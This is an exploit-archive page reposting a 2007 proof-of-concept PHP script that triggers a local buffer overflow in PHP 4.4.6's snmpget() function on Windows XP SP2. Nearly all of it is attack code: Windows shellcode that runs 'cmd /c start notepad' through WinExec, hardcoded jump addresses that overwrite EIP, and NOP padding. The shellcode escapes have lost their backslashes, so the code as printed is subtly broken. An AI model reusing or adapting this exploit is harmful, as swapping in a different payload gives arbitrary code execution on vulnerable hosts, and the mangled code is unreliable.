PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC
# Published : 2007-03-09
# Author : rgod
# Previous Title : PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC
# Next Title : PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC

<?php

// PHP 4.4.6 snmpget() object id local buffer overflow poc exploit
// by rgod
// site: http://retrogod.altervista.org

// win xp sp2 version
// to be launched form the cli


if (!extension_loaded("snmp")){
die("you need the snmp extension loaded.");
}

$____scode=
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbx6dx13x86x7c". //WinExec
"xffxd3".
"x31xc0".
"x50".
"xbbxdaxcdx81x7c". //ExitProcess
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"start notepad & ";

$edx="x64x8fx9bx01"; //jmp scode
$eip="x73xdcx82x7c"; //0x7C82DC73      jmp edx
$____suntzu=str_repeat("A",188).$edx.str_repeat("A",64).$eip.str_repeat("x90",48).$____scode.str_repeat("x90",48);
//more than 256 chars result in simple eip overwrite
snmpget(1,1,$____suntzu);

?>

# www.Syue.com [2007-03-09]